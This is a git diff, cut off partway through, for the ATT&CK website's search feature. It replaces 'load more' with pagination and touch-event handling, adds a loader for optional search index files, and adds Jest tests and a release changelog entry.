diff --git a/.towncrier.template.md b/.towncrier.template.md
deleted file mode 100644
index f0884fcd1cb..00000000000
--- a/.towncrier.template.md
+++ /dev/null
@@ -1,37 +0,0 @@
-{%- if top_line -%}
-# v{{ versiondata.version }} ({{ versiondata.date }})
-{%- endif -%}
-{%- for section, _ in sections.items() -%}
-  {%- if section -%}## {{ section }}{%- endif -%}
-  {%- if sections[section] -%}
-    {%- for category, val in definitions.items() if category in sections[section] %}
-
-## {{ definitions[category]['name'] }}
-      {% if definitions[category]['showcontent'] %}
-        {%- for text, values in sections[section][category].items() %}
-          {%- if values[0].endswith("/0)") %}
-
-* {{ definitions[category]['name'] }} without explicit PR/issue numbers
-  {{ text }}
-          {%- else %}
-
-* {{ text }} {{ values|join(',\n  ') }}
-          {%- endif %}
-
-        {%- endfor %}
-      {%- else %}
-
-* {{ sections[section][category]['']|join(', ') }}
-      {%- endif %}
-      {%- if sections[section][category]|length == 0 %}
-
-No significant changes.
-      {%- else %}
-      {%- endif %}
-
-    {%- endfor %}
-    {%- else %}
-
-No significant changes.
-  {%- endif %}
-{%- endfor %}
\ No newline at end of file
diff --git a/AGENTS.md b/AGENTS.md
index 1b2ad5a91a5..8eb252bd954 100644
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -188,7 +188,7 @@ Run commands from the repo root unless a subdirectory is called out.
 
 - Pull requests should target the `develop` branch per `CONTRIBUTING.md`.
 - The PR template expects a reviewer and a `CHANGELOG.md` update when appropriate.
-- `pyproject.toml` configures Towncrier for `CHANGELOG.md`; prefer the repository's release-note fragment workflow when one is present instead of hand-editing generated changelog sections.
+- The website version is configured in `modules/site_config.py`; keep it aligned with release tags and docs.
 - Do not assume `master` is the integration branch just because GitHub Pages deploys from it.
 - Use Conventional Commit style git messages.
 
diff --git a/CHANGELOG.md b/CHANGELOG.md
index e421173575a..702dccac9ed 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,12 @@
 # Website Changelog
 
+## v4.4.3 (2026-05-12)
+
+### Features
+
+* Release ATT&CK content version 19.1.
+  See detailed changes [here](https://github.com/mitre/cti/releases/tag/ATT%26CK-v19.1).
+  
 ## v4.4.2 (2026-04-28)
 
 ### Features
diff --git a/attack-search/__tests__/attack-index.test.js b/attack-search/__tests__/attack-index.test.js
index 0ec2cc44692..02c06562c74 100644
--- a/attack-search/__tests__/attack-index.test.js
+++ b/attack-search/__tests__/attack-index.test.js
@@ -84,8 +84,8 @@ describe('AttackIndex', () => {
         // Search the title index for "The"
         const results = await attackIndex.search('The', ['title']);
 
-        // Index 2 through 6 (inclusive) should have "The" in the title
-        const expectedResult = [{"field":"title","result":[2,3,4,5,6]}]
+        // Index 2 through 10 (inclusive) should have "The" in the title
+        const expectedResult = [{"field":"title","result":[2,3,4,5,6,7,8,9,10]}]
 
         expect(results).toEqual(expectedResult);
     });
diff --git a/attack-search/__tests__/search-events.test.js b/attack-search/__tests__/search-events.test.js
new file mode 100644
index 00000000000..f5dc8a6a20d
--- /dev/null
+++ b/attack-search/__tests__/search-events.test.js
@@ -0,0 +1,119 @@
+const mockJqueryCalls = [];
+const mockJqueryApis = {};
+
+const mockJquery = jest.fn((selector) => {
+  if (typeof selector === 'object' && selector.dataset) {
+    return {
+      data: jest.fn((key) => selector.dataset?.[toCamelCase(key)]),
+    };
+  }
+
+  const api = {
+    addClass: jest.fn(() => api),
+    attr: jest.fn(() => api),
+    data: jest.fn(),
+    focus: jest.fn(() => api),
+    hide: jest.fn(() => api),
+    on: jest.fn((events, delegatedSelector, handler) => {
+      mockJqueryCalls.push({
+        delegatedSelector: typeof delegatedSelector === 'string' ? delegatedSelector : null,
+        events,
+        handler: typeof delegatedSelector === 'function' ? delegatedSelector : handler,
+        selector,
+      });
+      return api;
+    }),
+    prop: jest.fn(() => api),
+    removeClass: jest.fn(() => api),
+    show: jest.fn(() => api),
+    toggle: jest.fn(() => api),
+    toggleClass: jest.fn(() => api),
+    val: jest.fn(() => ''),
+    keyup: jest.fn((handler) => {
+      mockJqueryCalls.push({
+        delegatedSelector: null,
+        events: 'keyup',
+        handler,
+        selector,
+      });
+      return api;
+    }),
+  };
+  mockJqueryApis[selector] = api;
+  return api;
+});
+
+mockJquery.getJSON = jest.fn();
+
+jest.mock('jquery', () => mockJquery);
+
+console.debug = jest.fn();
+console.error = jest.fn();
+
+describe('search event bindings', () => {
+  beforeEach(() => {
+    jest.resetModules();
+    mockJqueryCalls.length = 0;
+    Object.keys(mockJqueryApis).forEach(key => delete mockJqueryApis[key]);
+    global.build_uuid = 'test-build';
+    global.document = {};
+    global.localStorage = {
+      getItem: jest.fn(),
+      removeItem: jest.fn(),
+      setItem: jest.fn(),
+    };
+    global.window = {};
+  });
+
+  afterEach(() => {
+    delete global.build_uuid;
+    delete global.document;
+    delete global.localStorage;
+    delete global.window;
+  });
+
+  test('filter controls listen for touch activation events', () => {
+    require('../src/index');
+
+    expect(eventsForSelector('[data-search-filter-dropdown-toggle]')).toContain('touchend');
+    expect(eventsForSelector('[data-search-filter-page-type]')).toContain('touchend');
+    expect(eventsForSelector('[data-search-filter-domain]')).toContain('touchend');
+    expect(eventsForSelector('[data-search-filter-domain-action]')).toContain('touchend');
+    expect(eventsForSelector('[data-search-filter-group-action]')).toContain('touchend');
+    expect(eventsForSelector('[data-search-filter-reset]')).toContain('touchend');
+  });
+
+  test('dropdown toggles open before the search service is initialized', () => {
+    require('../src/index');
+
+    const handler = handlerForSelector('[data-search-filter-dropdown-toggle]');
+    handler({
+      currentTarget: { dataset: { searchFilterDropdownToggle: 'core' } },
+      stopPropagation: jest.fn(),
+      type: 'click',
+    });
+
+    expect(mockJqueryApis['[data-search-filter-dropdown-toggle="core"]'].toggleClass)
+      .toHaveBeenCalledWith('open', true);
+    expect(mockJqueryApis['[data-search-filter-dropdown-toggle="core"]'].attr)
+      .toHaveBeenCalledWith('aria-expanded', 'true');
+    expect(mockJqueryApis['[data-search-filter-dropdown="core"]'].toggle)
+      .toHaveBeenCalledWith(true);
+    expect(mockJqueryApis['[data-search-filter-dropdown="core"]'].attr)
+      .toHaveBeenCalledWith('aria-hidden', 'false');
+  });
+});
+
+function eventsForSelector(selector) {
+  return mockJqueryCalls
+    .filter(call => call.selector === selector || call.delegatedSelector === selector)
+    .flatMap(call => call.events.split(/\s+/));
+}
+
+function handlerForSelector(selector) {
+  return mockJqueryCalls.find(call => call.selector === selector || call.delegatedSelector === selector).handler;
+}
+
+function toCamelCase(key) {
+  return key.replace(/-([a-z])/g, (_, char) => char.toUpperCase());
+}
diff --git a/attack-search/__tests__/search-filters.test.js b/attack-search/__tests__/search-filters.test.js
index 8acd59f0474..a50581379b4 100644
--- a/attack-search/__tests__/search-filters.test.js
+++ b/attack-search/__tests__/search-filters.test.js
@@ -49,6 +49,20 @@ describe('SearchService filters', () => {
         pageType: 'resources',
         domains: [],
       },
+      {
+        id: 6,
+        title: 'Uncategorized',
+        content: 'Credential uncategorized material',
+        pageType: 'misc',
+        domains: [],
+      },
+      {
+        id: 7,
+        title: 'Multi-domain analytic',
+        content: 'Credential analytic',
+        pageType: 'analytics',
+        domains: ['enterprise', 'mobile'],
+      },
     ];
   });
 
@@ -61,6 +75,16 @@ describe('SearchService filters', () => {
     expect(searchService.applyFilters(documents)).toEqual(documents);
   });
 
+  test('unknown page types are searchable by default but excluded by narrowed page type filters', () => {
+    searchService.setSelectedPageTypes(['techniques']);
+
+    expect(searchService.applyFilters(documents).map(result => result.id)).toEqual([1]);
+
+    searchService.selectAllPageTypes();
+
+    expect(searchService.applyFilters(documents).map(result => result.id)).toEqual([1, 2, 3, 4, 5, 6, 7]);
+  });
+
   test('page type filters treat techniques and sub-techniques independently', () => {
     searchService.setSelectedPageTypes(['techniques']);
 
@@ -70,7 +94,7 @@ describe('SearchService filters', () => {
   test('domain filters only match documents with explicit selected domains', () => {
     searchService.setSelectedDomains(['enterprise']);
 
-    expect(searchService.applyFilters(documents).map(result => result.id)).toEqual([1, 2]);
+    expect(searchService.applyFilters(documents).map(result => result.id)).toEqual([1, 2, 7]);
   });
 
   test('empty page type selection returns no results', () => {
@@ -86,7 +110,7 @@ describe('SearchService filters', () => {
     const counts = searchService.getFilterCounts(documents);
 
     expect(counts.pageTypes).toEqual({
-      analytics: 0,
+      analytics: 1,
       assets: 0,
       campaigns: 0,
       datacomponents: 0,
@@ -102,11 +126,22 @@ describe('SearchService filters', () => {
     });
     expect(counts.domains).toEqual({
       enterprise: 2,
-      ics: 0,
       mobile: 1,
+      ics: 0,
     });
   });
 
+  test('multi-domain results count once per matching domain but once in total results', () => {
+    const counts = searchService.getFilterCounts(documents);
+
+    expect(counts.domains).toEqual({
+      enterprise: 3,
+      mobile: 2,
+      ics: 0,
+    });
+    expect(searchService.applyFilters(documents)).toHaveLength(7);
+  });
+
   test('clear session resets filters and query-scoped results', () => {
     searchService.allSearchResults = documents;
     searchService.setSelectedPageTypes(['techniques']);
@@ -138,15 +173,35 @@ describe('SearchService filters', () => {
     searchService.closeFilterDropdowns();
 
     expect(searchService.getOpenFilterDropdown()).toBeNull();
-    expect(searchService.applyFilters(documents).map(result => result.id)).toEqual([1, 2]);
+    expect(searchService.applyFilters(documents).map(result => result.id)).toEqual([1, 2, 7]);
   });
 
-  test('full filters panel closes subgroup dropdowns', () => {
-    searchService.toggleFilterDropdown('cti');
+  test('pagination exposes first last and five nearby pages for larger result sets', () => {
+    const manyDocuments = Array.from({ length: 183 }, (_, index) => ({
+      id: index + 1,
+      title: `Result ${index + 1}`,
+      content: 'Credential result',
+      pageType: 'resources',
+      domains: [],
+    }));
+
+    searchService.allSearchResults = manyDocuments;
+    searchService.resetFilters();
+
+    expect(searchService.getPaginationState()).toEqual({
+      currentPage: 1,
+      endResult: 10,
+      pageSize: 10,
+      pages: [1, 2, 3, 4, 5, 'ellipsis', 19],
+      showPagination: true,
+      startResult: 1,
+      totalPages: 19,
+      totalResults: 183,
+    });
 
-    searchService.toggleFiltersPanel();
+    searchService.goToPage(12);
 
-    expect(searchService.getOpenFilterDropdown()).toBeNull();
-    expect(searchService.filtersExpanded).toBe(true);
+    expect(searchService.getPaginationState().pages).toEqual([1, 'ellipsis', 10, 11, 12, 13, 14, 'ellipsis', 19]);
+    expect(searchService.getPaginationState().startResult).toBe(111);
   });
 });
diff --git a/attack-search/__tests__/search-loader.test.js b/attack-search/__tests__/search-loader.test.js
new file mode 100644
index 00000000000..e2b90ce395b
--- /dev/null
+++ b/attack-search/__tests__/search-loader.test.js
@@ -0,0 +1,26 @@
+const { loadSearchDocuments } = require('../src/search-loader');
+
+describe('search loader', () => {
+  test('skips missing optional search files and returns loaded documents', async () => {
+    const getJSON = jest.fn((url) => {
+      if (url.endsWith('misc.json')) return Promise.reject({ status: 404 });
+      return Promise.resolve([{ id: url, title: 'Loaded' }]);
+    });
+
+    const documents = await loadSearchDocuments('/search/', ['techniques.json', 'misc.json'], getJSON);
+
+    expect(documents).toEqual([{ id: '/search/techniques.json', title: 'Loaded' }]);
+  });
+
+  test('fails when every optional search file is missing', async () => {
+    const getJSON = jest.fn(() => Promise.reject({ status: 404 }));
+
+    await expect(loadSearchDocuments('/search/', ['misc.json'], getJSON)).rejects.toThrow('No search index files');
+  });
+
+  test('fails malformed existing search files', async () => {
+    const getJSON = jest.fn(() => Promise.reject(new SyntaxError('Unexpected token')));
+
+    await expect(loadSearchDocuments('/search/', ['techniques.json'], getJSON)).rejects.toThrow('Unexpected token');
+  });
+});
diff --git a/attack-search/__tests__/search-style.test.js b/attack-search/__tests__/search-style.test.js
new file mode 100644
index 00000000000..73a43d2718e
--- /dev/null
+++ b/attack-search/__tests__/search-style.test.js
@@ -0,0 +1,50 @@
+const fs = require('fs');
+const path = require('path');
+
+describe('search styles', () => {
+  test('marks page type and domain result badges with distinct classes', () => {
+    const searchService = fs.readFileSync(
+      path.join(__dirname, '../src/search-service.js'),
+      'utf8',
+    );
+
+    expect(searchService).toContain('search-result-badge-page-type');
+    expect(searchService).toContain('search-result-badge-domain');
+  });
+
+  test('renders result badges as subtle prominent chips', () => {
+    const styles = fs.readFileSync(
+      path.join(__dirname, '../../attack-style/components/_search.scss'),
+      'utf8',
+    );
+
+    const badgeStyle = styles.match(/\.search-result-badge\s*\{(?<body>[^}]+)\}/)?.groups?.body ?? '';
+
+    expect(badgeStyle).toContain('color: white;');
+    expect(badgeStyle).toContain('font-size: 0.8rem;');
+
+    expect(styles).toContain('.search-result-badge-page-type');
+    expect(styles).toContain('border-color: color-functions.color(active);');
+    expect(styles).toContain('background: color-functions.color-alternate(active, 1.5);');
+    expect(styles).toContain('.search-result-badge-domain');
+    expect(styles).toContain('border-color: color-functions.color(deemphasis);');
+    expect(styles).toContain('background: color-functions.color(deemphasis);');
+  });
+
+  test('renders search pagination controls as accessible icon buttons', () => {
+    const searchService = fs.readFileSync(
+      path.join(__dirname, '../src/search-service.js'),
+      'utf8',
+    );
+    const styles = fs.readFileSync(
+      path.join(__dirname, '../../attack-style/components/_search.scss'),
+      'utf8',
+    );
+
+    expect(searchService).toContain('aria-label="Previous page"');
+    expect(searchService).toContain('aria-label="Next page"');
+    expect(searchService).not.toContain('>Prev</button>');
+    expect(searchService).not.toContain('>Next</button>');
+    expect(styles).toContain('.search-pagination-icon');
+  });
+});
diff --git a/attack-search/__tests__/search-template.test.js b/attack-search/__tests__/search-template.test.js
new file mode 100644
index 00000000000..68d2c3f7b0a
--- /dev/null
+++ b/attack-search/__tests__/search-template.test.js
@@ -0,0 +1,36 @@
+const fs = require('fs');
+const path = require('path');
+
+describe('search template', () => {
+  test('places result counts and pagination above the result list', () => {
+    const template = fs.readFileSync(
+      path.join(__dirname, '../../attack-theme/templates/macros/search.html'),
+      'utf8',
+    );
+
+    const searchBodyStart = template.indexOf('<div id="search-body" class="search-body">');
+    const footerStart = template.indexOf('<div id="search-results-footer"', searchBodyStart);
+    const resultsStart = template.indexOf('<div class="results" id="search-results">', searchBodyStart);
+
+    expect(searchBodyStart).toBeGreaterThan(-1);
+    expect(footerStart).toBeGreaterThan(-1);
+    expect(resultsStart).toBeGreaterThan(-1);
+    expect(footerStart).toBeLessThan(resultsStart);
+  });
+
+  test('places pagination controls after the result list for sticky bottom positioning', () => {
+    const template = fs.readFileSync(
+      path.join(__dirname, '../../attack-theme/templates/macros/search.html'),
+      'utf8',
+    );
+
+    const searchBodyStart = template.indexOf('<div id="search-body" class="search-body">');
+    const resultsStart = template.indexOf('<div class="results" id="search-results">', searchBodyStart);
+    const paginationStart = template.indexOf('<div id="search-results-pagination"', searchBodyStart);
+
+    expect(searchBodyStart).toBeGreaterThan(-1);
+    expect(resultsStart).toBeGreaterThan(-1);
+    expect(paginationStart).toBeGreaterThan(-1);
+    expect(resultsStart).toBeLessThan(paginationStart);
+  });
+});
diff --git a/attack-search/__tests__/settings.test.js b/attack-search/__tests__/settings.test.js
index 011f64d4b79..9c64963c4a2 100644
--- a/attack-search/__tests__/settings.test.js
+++ b/attack-search/__tests__/settings.test.js
@@ -4,4 +4,8 @@ describe('search settings', () => {
   test('loads the generated sub-technique search index', () => {
     expect(searchFilePaths).toContain('sub-techniques.json');
   });
+
+  test('keeps the generated misc search index for unknown pages', () => {
+    expect(searchFilePaths).toContain('misc.json');
+  });
 });
diff --git a/attack-search/src/attack-index.js b/attack-search/src/attack-index.js
index c78120da9a3..86e7b1a77cb 100644
--- a/attack-search/src/attack-index.js
+++ b/attack-search/src/attack-index.js
@@ -40,11 +40,11 @@ module.exports = class AttackIndex {
      * Searches the FlexSearch instance.
      * @param {string} query - The search query.
      * @param {Array<string>} fields - The index fields to search: ['title'], ['content'], or ['title', 'content'].
-     * @param {number} [limit=5] - The maximum number of results to return.
+     * @param {number} [limit=10] - The maximum number of results to return.
      * @param {number} [offset=0] - The offset to start the search results from.
      * @returns {Promise<Array<Object>>} - An array of search results.
      */
-    async search(query, fields, limit = 5, offset = 0) {
+    async search(query, fields, limit = 10, offset = 0) {
 
         // Validate input fields
         const allowedFields = [
diff --git a/attack-search/src/components.js b/attack-search/src/components.js
index 3a9b57c8d9f..fd8f33c180f 100644
--- a/attack-search/src/components.js
+++ b/attack-search/src/components.js
@@ -18,14 +18,12 @@ module.exports.searchInput = $('#search-input');
 // body of search results
 module.exports.searchBody = $('#search-body');
 
-// button to show more results
-module.exports.loadMoreResults = $('#load-more-results');
-module.exports.loadMoreResultsButton = $('#load-more-results-button');
-
 // search parsing icon
 module.exports.searchParsingIcon = $('#search-parsing-icon');
 
 // inline search filters
 module.exports.searchFilters = $('#search-filters');
-module.exports.searchFiltersPanel = $('#search-filters-panel');
-module.exports.searchFiltersToggle = $('#search-filters-toggle');
+
+// search result pagination and counts
+module.exports.searchResultsFooter = $('#search-results-footer');
+module.exports.searchResultsPagination = $('#search-results-pagination');
diff --git a/attack-search/src/index.js b/attack-search/src/index.js
index ce519c57ae8..68447ba36ab 100644
--- a/attack-search/src/index.js
+++ b/attack-search/src/index.js
@@ -10,9 +10,10 @@ const $ = require('jquery');
  */
 
 // Import required modules with the correct file extension
-const { baseURL, searchFilePaths } = require('./settings.js');
+const { baseURL, searchCacheSchemaVersion, searchFilePaths } = require('./settings.js');
 const Debouncer = require('./debouncer.js');
 const SearchService = require('./search-service.js');
+const { loadSearchDocuments } = require('./search-loader.js');
 
 // Import required components
 const {
@@ -23,9 +24,45 @@ const {
   searchButton,
   searchIcon,
   closeButton,
-  loadMoreResultsButton,
 } = require('./components.js');
 
+const searchCacheKey = `saved_uuid_search_schema_${searchCacheSchemaVersion}`;
+let searchService;
+let openFilterDropdownKey = null;
+
+const setFilterDropdownOpenState = function (dropdownKey, isOpen) {
+  const toggle = $(`[data-search-filter-dropdown-toggle="${dropdownKey}"]`);
+  const dropdown = $(`[data-search-filter-dropdown="${dropdownKey}"]`);
+
+  toggle.toggleClass('open', isOpen);
+  toggle.attr('aria-expanded', isOpen.toString());
+  dropdown.toggle(isOpen);
+  dropdown.attr('aria-hidden', (!isOpen).toString());
+};
+
+const toggleFilterDropdown = function (dropdownKey) {
+  if (searchService) {
+    searchService.toggleFilterDropdown(dropdownKey);
+    return;
+  }
+
+  const previousDropdownKey = openFilterDropdownKey;
+  const isOpening = previousDropdownKey !== dropdownKey;
+
+  if (previousDropdownKey) setFilterDropdownOpenState(previousDropdownKey, false);
+  openFilterDropdownKey = isOpening ? dropdownKey : null;
+  if (openFilterDropdownKey) setFilterDropdownOpenState(openFilterDropdownKey, true);
+};
+
+const closeFilterDropdowns = function () {
+  if (searchService?.closeFilterDropdowns?.()) return true;
+  if (!openFilterDropdownKey) return false;
+
+  setFilterDropdownOpenState(openFilterDropdownKey, false);
+  openFilterDropdownKey = null;
+  return true;
+};
+
 // Open search overlay
 const openSearch = function () {
   searchBody.hide();
@@ -38,6 +75,7 @@ const openSearch = function () {
 const closeSearch = function () {
   searchInput.val('');
   if (searchService) searchService.clearSession();
+  closeFilterDropdowns();
   searchOverlay.hide();
   searchOverlay.addClass('hidden');
 };
@@ -50,7 +88,8 @@ async function initializeSearchService() {
   console.debug('Initializing search service...');
   searchParsingIcon.show();
 
-  const saved_uuid = localStorage.getItem('saved_uuid');
+  const saved_uuid = localStorage.getItem(searchCacheKey);
+  const cachedBuildId = `${build_uuid}-search-${searchCacheSchemaVersion}`;
   console.debug(`Retrieved the saved_uuid from localStorage: ${saved_uuid}`);
 
   // Check if the browser supports IndexedDB. Search service can only work in environments that support IndexedDB.
@@ -58,7 +97,7 @@ async function initializeSearchService() {
     // Verify if the buildUUID is already cached in LocalStorage. This check is performed to determine if the search
     // service has been initialized. Each website build instance possesses a unique buildUUID, preventing different
     // website builds from sharing the same search index.
-    if (saved_uuid && saved_uuid === build_uuid) {
+    if (saved_uuid && saved_uuid === cachedBuildId) {
       // Restore search service from IndexedDB
       try {
         console.debug('Initializing SearchService (assume documents already cached)...');
@@ -79,26 +118,14 @@ async function initializeSearchService() {
       console.debug('Documents not cached yet.');
 
       const baseUrl = `${baseURL}/search/`;
-      const jsonFiles = [];
-
-      // Download all JSON files from directory
-      // Loop through the searchFilePaths array to construct the URLs
-      searchFilePaths.forEach(function(filename) {
-        jsonFiles.push(baseUrl + filename);
-      });
-
-      // Use Promise.all() to download all files concurrently
-      Promise.all(jsonFiles.map(url => $.getJSON(url)))
-        .then(data => {
-          // Concatenate all file data into a single array
-          const combinedData = data.reduce((acc, curr) => acc.concat(curr), []);
-
-          // Initialize search service with combined data
-          searchService = new SearchService('search-results', build_uuid);
+      loadSearchDocuments(baseUrl, searchFilePaths, $.getJSON)
+        .then(combinedData => {
+          searchService = new SearchService('search-results', cachedBuildId);
           return searchService.initializeAsync(combinedData);
         })
         .then(() => {
-          localStorage.setItem('saved_uuid', build_uuid);
+          localStorage.setItem(searchCacheKey, cachedBuildId);
+          localStorage.removeItem('saved_uuid');
           console.debug('SearchService is initialized.');
           searchParsingIcon.hide();
           searchServiceIsLoaded = true;
@@ -121,9 +148,6 @@ async function initializeSearchService() {
   }
 }
 
-// Declare search service variable
-let searchService;
-
 // Perform a search using the search service
 const search = async function (query) {
   console.debug(`search -> Received search query: ${query}`);
@@ -142,6 +166,21 @@ const search = async function (query) {
 
 // Instantiate a debouncer
 const debounce = new Debouncer(300);
+let lastTouchActivation = 0;
+
+const shouldHandleActivation = function (e) {
+  if (e.type === 'touchend') {
+    lastTouchActivation = Date.now();
+    e.preventDefault();
+    e.stopPropagation();
+    return true;
+  }
+
+  if (Date.now() - lastTouchActivation < 700) return false;
+
+  e.stopPropagation();
+  return true;
+};
 
 // Set up event handlers for closing search
 searchOverlay.on('click', function (e) {
@@ -149,7 +188,9 @@ searchOverlay.on('click', function (e) {
   closeSearch();
 });
 $(document).keyup((e) => {
-  e.key === 'Escape' ? closeSearch() : null;
+  if (e.key !== 'Escape') return;
+  if (closeFilterDropdowns()) return;
+  closeSearch();
 });
 
 // Set up event handler for close button
@@ -167,52 +208,31 @@ searchInput.on('input', (e) => {
   });
 });
 
-// Set up event handler for load more results button
-loadMoreResultsButton.on('click', () => {
-  if (searchService) searchService.loadMoreResults();
-  loadMoreResultsButton.blur(); // onfocus
-});
-
-$('[data-search-filter-toggle]').on('click', () => {
-  if (searchService) searchService.toggleFiltersPanel();
-});
-
-$('[data-search-filter-dropdown-toggle]').on('click', (e) => {
-  e.stopPropagation();
-  if (searchService) {
-    searchService.toggleFilterDropdown($(e.currentTarget).data('search-filter-dropdown-toggle'));
-  }
+$('[data-search-filter-dropdown-toggle]').on('touchend click', (e) => {
+  if (!shouldHandleActivation(e)) return;
+  toggleFilterDropdown($(e.currentTarget).data('search-filter-dropdown-toggle'));
 });
 
-$('[data-search-filter-dropdown]').on('click', (e) => {
+$('[data-search-filter-dropdown]').on('touchend click', (e) => {
   e.stopPropagation();
 });
 
-$(document).on('click', () => {
-  if (searchService) searchService.closeFilterDropdowns();
+$(document).on('touchend click', () => {
+  closeFilterDropdowns();
 });
 
-$(document).on('keyup', (e) => {
-  if (e.key === 'Escape' && searchService) searchService.closeFilterDropdowns();
-});
-
-$('[data-search-filter-page-type]').on('click', (e) => {
+$('[data-search-filter-page-type]').on('touchend change', (e) => {
+  if (!shouldHandleActivation(e)) return;
   if (searchService) searchService.togglePageType($(e.currentTarget).data('search-filter-page-type'));
 });
 
-$('[data-search-filter-domain]').on('click', (e) => {
+$('[data-search-filter-domain]').on('touchend change', (e) => {
+  if (!shouldHandleActivation(e)) return;
   if (searchService) searchService.toggleDomain($(e.currentTarget).data('search-filter-domain'));
 });
 
-$('[data-search-filter-page-types-action]').on('click', (e) => {
-  if (!searchService) return;
-  const action = $(e.currentTarget).data('search-filter-page-types-action');
-
-  if (action === 'all') searchService.selectAllPageTypes();
-  if (action === 'none') searchService.clearPageTypes();
-});
-
-$('[data-search-filter-domain-action]').on('click', (e) => {
+$('[data-search-filter-domain-action]').on('touchend click', (e) => {
+  if (!shouldHandleActivation(e)) return;
   if (!searchService) return;
   const action = $(e.currentTarget).data('search-filter-domain-action');
 
@@ -220,7 +240,8 @@ $('[data-search-filter-domain-action]').on('click', (e) => {
   if (action === 'none') searchService.clearDomains();
 });
 
-$('[data-search-filter-group-action]').on('click', (e) => {
+$('[data-search-filter-group-action]').on('touchend click', (e) => {
+  if (!shouldHandleActivation(e)) return;
   if (!searchService) return;
   const button = $(e.currentTarget);
   searchService.setPageTypeGroupSelected(
@@ -229,6 +250,15 @@ $('[data-search-filter-group-action]').on('click', (e) => {
   );
 });
 
+$('[data-search-filter-reset]').on('touchend click', (e) => {
+  if (!shouldHandleActivation(e)) return;
+  if (searchService) searchService.resetFilters();
+});
+
+$(document).on('click', '[data-search-page]', (e) => {
+  if (searchService) searchService.goToPage(Number($(e.currentTarget).data('search-page')));
+});
+
 // Add compatibility patches for Internet Explorer
 if (!String.prototype.includes) {
   String.prototype.includes = function (search, start) {
diff --git a/attack-search/src/search-loader.js b/attack-search/src/search-loader.js
new file mode 100644
index 00000000000..0c3e50599ce
--- /dev/null
+++ b/attack-search/src/search-loader.js
@@ -0,0 +1,34 @@
+function isMissingSearchIndexError(error) {
+  return error?.status === 404 || error?.status === 0;
+}
+
+async function loadSearchDocuments(baseUrl, searchFilePaths, getJSON) {
+  const settled = await Promise.all(searchFilePaths.map(async (filename) => {
+    const url = `${baseUrl}${filename}`;
+
+    try {
+      return {
+        documents: await getJSON(url),
+        filename,
+        loaded: true,
+      };
+    } catch (error) {
+      if (isMissingSearchIndexError(error)) {
+        console.debug(`Skipping missing search index file: ${filename}`);
+        return { documents: [], filename, loaded: false };
+      }
+      throw error;
+    }
+  }));
+
+  const loadedFiles = settled.filter((result) => result.loaded);
+  if (loadedFiles.length === 0) {
+    throw new Error('No search index files loaded.');
+  }
+
+  return loadedFiles.reduce((acc, result) => acc.concat(result.documents), []);
+}
+
+module.exports = {
+  loadSearchDocuments,
+};
diff --git a/attack-search/src/search-service.js b/attack-search/src/search-service.js
index 9a049c5aa9c..d5d010e755b 100644
--- a/attack-search/src/search-service.js
+++ b/attack-search/src/search-service.js
@@ -8,10 +8,9 @@ const AttackIndex = require('./attack-index.js');
 
 // eslint-disable-next-line import/extensions
 const {
-  loadMoreResults,
   searchBody,
-  searchFiltersPanel,
-  searchFiltersToggle,
+  searchResultsFooter,
+  searchResultsPagination,
 } = require('./components.js');
 
 const PAGE_TYPE_GROUPS = [
@@ -55,12 +54,13 @@ const PAGE_TYPE_LABELS = {
 
 const DOMAIN_LABELS = {
   enterprise: 'Enterprise',
-  ics: 'ICS',
   mobile: 'Mobile',
+  ics: 'ICS',
 };
 
 const PAGE_TYPES = PAGE_TYPE_GROUPS.flatMap((group) => group.pageTypes);
-const DOMAINS = Object.keys(DOMAIN_LABELS);
+const DEFAULT_PAGE_TYPES = PAGE_TYPES.concat('misc');
+const DOMAINS = ['enterprise', 'mobile', 'ics'];
 const FILTER_DROPDOWNS = PAGE_TYPE_GROUPS.map((group) => group.key).concat('domains');
 
 module.exports = class SearchService {
@@ -79,9 +79,8 @@ module.exports = class SearchService {
     // 2* buffer is roughly the size of the result preview
     this.buffer = 200;
 
-    // Sets the maximum number of search results displayed on a single page.
-    // Clicking "Load more results" will add ${pageLimit} additional results to the current page.
-    this.pageLimit = 5;
+    this.pageLimit = 10;
+    this.currentPage = 1;
 
     this.currentQuery = {
       clean: '',
@@ -98,11 +97,10 @@ module.exports = class SearchService {
 
     this.render_container = $(`#${tag}`);
 
-    this.selectedPageTypes = new Set(PAGE_TYPES);
+    this.selectedPageTypes = new Set(DEFAULT_PAGE_TYPES);
     this.selectedDomains = new Set(DOMAINS);
     this.allSearchResults = [];
     this.searchResults = [];
-    this.filtersExpanded = false;
     this.openFilterDropdown = null;
 
     if (this.render_container?.on) {
@@ -259,13 +257,14 @@ module.exports = class SearchService {
    * @param {string} query - The raw search query string.
    */
   async query(query) {
-    this.offset = 0;
+    this.currentPage = 1;
     this.#cleanTheQuery(query);
     this.render_container.html('');
 
     if (this.currentQuery.clean === '') {
       this.allSearchResults = [];
       this.searchResults = [];
+      this.currentPage = 1;
       this.#renderSearchResults([]);
       this.#updateFilterControls();
       return;
@@ -332,21 +331,17 @@ module.exports = class SearchService {
       resultHTML = resultHTML.join('');
       if (this.render_container?.append) this.render_container.append(resultHTML);
 
-      // if there are more pages to show
-      if (this.offset + this.pageLimit < this.searchResults.length) {
-        loadMoreResults?.show?.();
-      } else {
-        loadMoreResults?.hide?.();
-      }
+      this.#renderResultsFooter();
 
     } else if (this.currentQuery.clean !== '') {
       // search with no results
       searchBody?.show?.();
       if (this.render_container?.html) this.render_container.html(this.#emptyResultsHTML());
-      loadMoreResults?.hide?.();
+      this.#renderResultsFooter();
     } else {
       // query for empty string
       searchBody?.hide?.();
+      this.#clearResultsFooter();
     }
   }
 
@@ -432,6 +427,7 @@ module.exports = class SearchService {
    */
   togglePageType(pageType) {
     if (!PAGE_TYPES.includes(pageType)) return;
+    this.selectedPageTypes.delete('misc');
     this.#toggleSetValue(this.selectedPageTypes, pageType);
     this.#renderFilteredSearchResults();
   }
@@ -462,6 +458,7 @@ module.exports = class SearchService {
         this.selectedPageTypes.delete(pageType);
       }
     });
+    this.selectedPageTypes.delete('misc');
     this.#renderFilteredSearchResults();
   }
 
@@ -469,7 +466,7 @@ module.exports = class SearchService {
    * Selects every page type.
    */
   selectAllPageTypes() {
-    this.selectedPageTypes = new Set(PAGE_TYPES);
+    this.selectedPageTypes = new Set(DEFAULT_PAGE_TYPES);
     this.#renderFilteredSearchResults();
   }
 
@@ -501,7 +498,7 @@ module.exports = class SearchService {
    * Resets all filters to their default all-selected state.
    */
   resetFilters() {
-    this.selectedPageTypes = new Set(PAGE_TYPES);
+    this.selectedPageTypes = new Set(DEFAULT_PAGE_TYPES);
